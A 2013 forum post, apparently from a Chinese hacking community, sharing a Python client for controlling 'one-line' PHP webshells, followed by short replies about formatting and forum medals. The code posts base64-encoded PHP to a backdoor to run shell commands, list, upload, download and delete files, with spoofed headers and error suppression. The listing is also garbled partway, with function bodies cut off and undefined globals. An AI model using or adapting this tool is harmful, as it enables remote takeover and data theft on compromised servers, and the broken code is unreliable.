切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
lbw rood 一句话客户端。[复制链接]
发表于 2013-8-8 21:53:10 | 显示全部楼层 |!read_mode!
# -*- coding: utf-8 -*-
import httplib, sys
from base64 import b64encode
from urllib import urlencode

#全局变量首字母大写

Ospath = False
Header = {'Content-Type':'application/x-www-form-urlencoded',
          'User-Agent':'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31',
          'X-Forwarded-For':'127.0.0.1'}

code = {
#PHP
"php":{
        #绕过前缀
        "safe":"@ini_set('display_errors','0');@set_time_limit(0);@set_magic_quotes_runtime(0);",
        #shell执行
        "shell":"echo shell_exec('command');",
        #当前路径回显
        "getcwd":"echo getcwd();",
        #工作目录跳转
        "cd":"chdir('command');",
        #回显目录内容
        "ls":"print_r(scandir('command'));",
        #复制文件
        "copy":"copy('command1','command2');",
        #删除文件
        "del":"unlink('command');",
        #回显某文件二进制格式
        "down":"echo fread(fopen('command','rb'),filesize('command'));",
        #获取文件二进制格式并写入文件
        "up":"fwrite(fopen('command','wb'),$_POST['files']);",
#        "wget":"fwrite(fopen('commandname','wb'),fopen('command','rb'))",
        #其他命令执行方式
        "overshell":["echo popen('command','r');","echo exec('command');","echo system('command');","echo passthru('command');"],
       },
#Python:Django
"python":{
        "safe":"from django.http import HttpResponse;",
        "shell":"import os;return HTTP(os.system('command'))",
        #略
    },
    }

def cmdcmd(shells, name, cmd):
    #替换code中的command
    return Codes[shells].replace(name, cmd)

def encrypt(command):
    return b64encode(command)

def inpu():
    #代替input
    global Ospath
    door = httplib.HTTPConnection(Host)
    if Ospath:
        tmpcode = Codes['safe']+cmdcmd('cd','command',Ospath)+Codes['getcwd']
    else:
        tmpcode = Codes['safe']+Codes['getcwd']
    try:
        door.request('POST', Path, urlencode({Key:encrypt(tmpcode)}), Header)
    except:
        print 'error not on ' + Host
        exit()
    Ospath = door.getresponse().read().replace('\\', '/')
    command = raw_input(Ospath + ' >')
    door.close()
    return command

def cd(door, command):
    #工作目录跳转,保存至变量Ospath
    global Ospath
    tmpcode = Codes['safe']+cmdcmd('cd','command',Ospath)+cmdcmd('cd','command',command)+Codes['getcwd']
    door.request('POST', Path, urlencode({Key:encrypt(tmpcode)}), Header)
    Ospath = door.getresponse().read()
    door.close()
    return

def shell(door, command):
    #执行命令,执行前跳转至工作目录
    global Ospath
    tmpcode = Codes['safe']+cmdcmd('cd','command',Ospath)+cmdcmd('shell','command',command)
    door.request('POST', Path, urlencode({Key:encrypt(tmpcode)}), Header)
    echo = door.getresponse().read()
    door.close()
    return echo

def make(door, command):
    #自定义执行脚本代码
    global Ospath
    tmpcode = Codes['safe']+cmdcmd('cd','command',Ospath)+command
    door.request('POST', Path, urlencode({Key:encrypt(tmpcode)}), Header)
    echo = door.getresponse().read()
    door.close()
    return echo

def codex(door, command, types):
    #各种内置脚本实现功能,以防shell函数被禁用时无法操作
    if types == '@ls':
        if len(command) == 1:
            inpath = Ospath
        else:
            inpath = command[1]
        tmpcode = Codes['safe']+cmdcmd('cd','command',Ospath)+cmdcmd('ls','command',inpath)
    elif types == '@ls':
            print codex(door,cmd,cmd[0])
        elif cmd[0] == '@copy' or cmd[0] == '@del' or cmd[0] == '@down' or\
        cmd[0] == '@up':# or cmd[0] == '@wget':
            print codex(door,cmd[1],cmd[0])
        else:
            print shell(door,command)

if __name__ == '__main__':
    main()

发表于 2013-8-8 22:07:51 | 显示全部楼层
感谢分享
帮你改成代码模式了
发表于 2013-8-10 09:05:27 | 显示全部楼层
抚菊深思 发表于 2013-8-8 22:07
感谢分享
帮你改成代码模式了

求勋章,有些地方进不去,纠结死了。

发表于 2013-8-10 09:07:26 | 显示全部楼层
小男孩 发表于 2013-8-10 09:05
求勋章,有些地方进不去,纠结死了。

勋章中心可以自己申请
发表于 2013-8-10 10:55:40 | 显示全部楼层
抚菊深思 发表于 2013-8-10 09:07
勋章中心可以自己申请

3个人工授予的,一个600个JB,不能这样。。。

代码区

GMT+8, 2019-11-17 08:36

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部